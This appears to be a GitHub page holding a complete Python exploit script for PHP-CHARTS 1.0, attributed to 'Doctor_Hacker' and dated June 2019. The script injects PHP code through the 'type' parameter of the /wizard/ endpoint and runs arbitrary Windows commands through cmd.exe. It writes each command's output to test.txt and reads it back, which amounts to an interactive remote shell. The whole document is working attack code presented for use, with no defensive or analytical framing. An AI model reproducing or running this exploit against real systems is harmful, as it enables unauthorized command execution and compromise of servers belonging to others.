-
Notifications
You must be signed in to change notification settings - Fork 0
/
phpcharts.py
43 lines (35 loc) · 1.02 KB
/
phpcharts.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Exploit Title : PHP-CHARTS 1.0
# Date : 26 June 2019
# Exploit Author : Doctor_Hacker
# Version : 1.0
# Tested on : Windows
import requests
#Define IP and port.
IP='127.0.0.1'
port=80
try:
#Does the URL exist??
url="http://"+IP+":"+str(port)+"/wizard/index.php"
response = requests.get(url)
while True:
#Get the command
print ("Type exit to get out of here.")
cmd = input('shell@'+IP+':~# ')
if cmd.strip() == 'exit':
break
#Buld URL String
url="http://"+IP+":"+str(port)+"/wizard/?type='"
url=url+';echo exec("c:\\Windows\\system32\\cmd.exe /c '+cmd+' >test.txt");'
url=url+"'';';"
try:
response = requests.get(url)
if response.status_code == 200:
# To view the directory listing, browse to
url="http://"+IP+":"+str(port)+"/wizard/test.txt"
response = requests.get(url)
print(response.text)
except:
print ("Exploit failed.")
except:
print ("I can't reach the site. Is the website up?")
# And sleep............